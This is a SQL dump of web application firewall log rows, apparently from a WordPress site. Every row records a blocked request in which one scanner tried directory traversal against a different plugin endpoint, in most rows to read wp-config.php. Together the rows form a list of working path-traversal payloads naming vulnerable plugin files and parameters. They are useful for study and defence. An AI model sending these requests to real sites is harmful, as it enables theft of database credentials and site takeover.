(5200, 1595955800.050654, 1595955800.003400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZWxsLWRvd25sb2Fkcy9zZWxsLWRvd25sb2Fkcy5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5201, 1595955799.932687, 1595955799.896800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZS1odG1sNS1hbGJ1bS1hdWRpby1wbGF5ZXIvZG93bmxvYWRfYXVkaW8ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5202, 1595955799.830706, 1595955799.801200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zM2J1YmJsZS1hbWF6b24tczMtaHRtbC01LXZpZGVvLXdpdGgtYWR2ZXJ0cy9hc3NldHMvcGx1Z2lucy91bHRpbWF0ZS9jb250ZW50L2Rvd25sb2FkZXIucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5203, 1595955799.719686, 1595955799.696800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yb2JvdGNwYS9mLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5204, 1595955799.624471, 1595955799.575500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWxvY2F0ZS11cGxvYWQvcmVsb2NhdGUtdXBsb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5205, 1595955799.510657, 1595955799.482000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5206, 1595955799.415691, 1595955799.394100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yYi1hZ2VuY3kvZXh0L2ZvcmNlZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5207, 1595955799.294523, 1595955799.271300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wb3N0LXJlY29tbWVuZGF0aW9ucy1mb3Itd29yZHByZXNzL2xpYi9hcGkucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5208, 1595955799.207308, 1595955799.187400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkYXRhXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wbHVnaW4tbmV3c2xldHRlci9wcmV2aWV3LnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5209, 1595955799.120007, 1595955799.093700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzaXplXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWN0cHJlc3MvcmVzaXplLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5210, 1595955799.028346, 1595955799.007700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWduYW1lXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9waWNhLXBob3RvLWdhbGxlcnkvcGljYWRvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5211, 1595955798.943227, 1595955798.915800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9waG90b2NhcnQtbGluay9kZWNvZGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5212, 1595955798.798330, 1595955798.778300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tib29rX2lkXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWdlLWZsaXAtaW1hZ2UtZ2FsbGVyeS9ib29rcy9nZXRDb25maWcucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5213, 1595955798.713655, 1595955798.692700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tvcHNfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9vbGQtcG9zdC1zcGlubmVyL2xvZ3ZpZXcucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5214, 1595955798.624811, 1595955798.605200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5215, 1595955798.540791, 1595955798.520800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cFBBVEhd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWZsYXNoL215Zmxhc2gtYnV0dG9uLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5216, 1595955798.438488, 1595955798.419300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5217, 1595955798.354636, 1595955798.334300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkb3dubG9hZF9maWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZW1iZXJzaGlwLXNpbXBsaWZpZWQtZm9yLW9hcC1tZW1iZXJzLW9ubHkvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5218, 1595955798.270380, 1595955798.232900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cGFic3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlsei9saXN0cy9jb25maWcvY29uZmlnLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5219, 1595955798.162360, 1595955798.113000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twbF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWlsLW1hc3RhL2luYy9jYW1wYWlnbi9jb3VudF9vZl9zZW5kLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5220, 1595955798.045167, 1595955798.005600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtbG9hZC5waHA=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtcGhvdG8tZ2FsbGVyeS9tYWNkb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5221, 1595955797.938132, 1595955797.899300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9sb2NhbGl6ZS1teS1wb3N0L2FqYXgvaW5jbHVkZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5222, 1595955797.817054, 1595955797.797900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cC1yb290XQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saXZlc2lnL2xpdmVzaWctYWpheC1iYWNrZW5kLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5223, 1595955797.733699, 1595955797.712300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qdXN0aWZpZWQtaW1hZ2UtZ3JpZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5224, 1595955797.643497, 1595955797.606000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tza2luXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qcXVlcnktbWVnYS1tZW51L3NraW4ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5225, 1595955797.534397, 1595955797.488700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWRiLXdpZGdldC9waWMucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5226, 1595955797.419562, 1595955797.354100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbWFnZS1leHBvcnQvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5227, 1595955797.262126, 1595955797.218800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pYnMtbWFwcHJvL2xpYi9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5228, 1595955797.150748, 1595955797.105800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t2YXJd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oaXN0b3J5LWNvbGxlY3Rpb24vZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5229, 1595955796.993002, 1595955796.949700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oYi1hdWRpby1nYWxsZXJ5LWxpdGUvZ2FsbGVyeS9hdWRpby1kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5230, 1595955796.824200, 1595955796.788400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Gwolle Guestbook <= 1.5.3 - Remote File Inclusion', '{\"learningMode\":0,\"failedRules\":\"17\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nd29sbGUtZ2IvZnJvbnRlbmQvY2FwdGNoYS9hamF4cmVzcG9uc2UucGhw\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nd29sbGUtZ2IvZnJvbnRlbmQvY2FwdGNoYS9hamF4cmVzcG9uc2UucGhw\",\"category\":\"rfi\",\"ssl\":0}'),
(5231, 1595955796.719979, 1595955796.675600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tjZmdd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9ncmFjZW1lZGlhLW1lZGlhLXBsYXllci90ZW1wbGF0ZXMvZmlsZXMvYWpheF9jb250cm9sbGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5232, 1595955796.608503, 1595955796.564700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5233, 1595955796.497301, 1595955796.457400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9maWxlZG93bmxvYWQvZG93bmxvYWQucGhwLw==\",\"category\":\"lfi\",\"ssl\":0}'),
